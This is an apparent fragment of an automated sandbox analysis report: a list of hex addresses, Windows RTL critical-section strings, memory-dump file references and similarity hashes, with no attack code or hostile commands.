                                                0x01f0ec9a
                                                0x01f0ec9a
                                                0x01f0ebd6
                                                0x01f0ebd6
                                                0x00000000
                                                0x01f0ebbb
                                                0x01f42477
                                                0x01f4247c
                                                0x01f42486
                                                0x01f4248b
                                                0x01f42496
                                                0x01f4249b
                                                0x01f4249d
                                                0x01f424a0
                                                0x01f424a3
                                                0x01f424aa
                                                0x01f424aa
                                                0x01f424a5
                                                0x01f424a5
                                                0x01f424a5
                                                0x01f424ac
                                                0x01f424af
                                                0x01f424b0
                                                0x01f424b3
                                                0x01f424b9
                                                0x01f424ba
                                                0x01f424bb
                                                0x01f424c6
                                                0x01f424cb
                                                0x01f424cd
                                                0x01f424d0
                                                0x01f424d1
                                                0x01f424d4
                                                0x01f424d6
                                                0x01f424d9
                                                0x01f424d9
                                                0x01f424dc
                                                0x01f424df
                                                0x01f424e1
                                                0x01f424e7
                                                0x01f424e9
                                                0x01f424ec
                                                0x01f424ef
                                                0x01f424f2
                                                0x01f424f2
                                                0x01f424ef
                                                0x01f424e7
                                                0x01f424fa
                                                0x01f424ff
                                                0x01f42501
                                                0x01f42503
                                                0x01f42506
                                                0x01f4250b
                                                0x01f0eb8c
                                                0x01f0eb93
                                                0x00000000
                                                0x00000000
                                                0x01f0eb93
                                                0x00000000
                                                0x01f0eb99
                                                0x01f0ec85
                                                0x01f0ec85
                                                0x01f0ec85
                                                0x00000000

                                                Strings
                                                • RTL: Re-Waiting, xrefs: 01F424FA
                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 01F4248D
                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 01F424BD
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                • API String ID: 0-3177188983
                                                • Opcode ID: 84b0572a1ee31b626cb6034572bf481f14592e2b9403437531198f8362fe630d
                                                • Instruction ID: e3d94cdb6bbb500a2bfc3c1f30b17af26ded59282a00e3e17367e8770bc31331
                                                • Opcode Fuzzy Hash: 84b0572a1ee31b626cb6034572bf481f14592e2b9403437531198f8362fe630d
                                                • Instruction Fuzzy Hash: 534118B1A00605EBD720DB68DC89F6E7BB8EF84320F108A19F6559B2D1D736E941C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%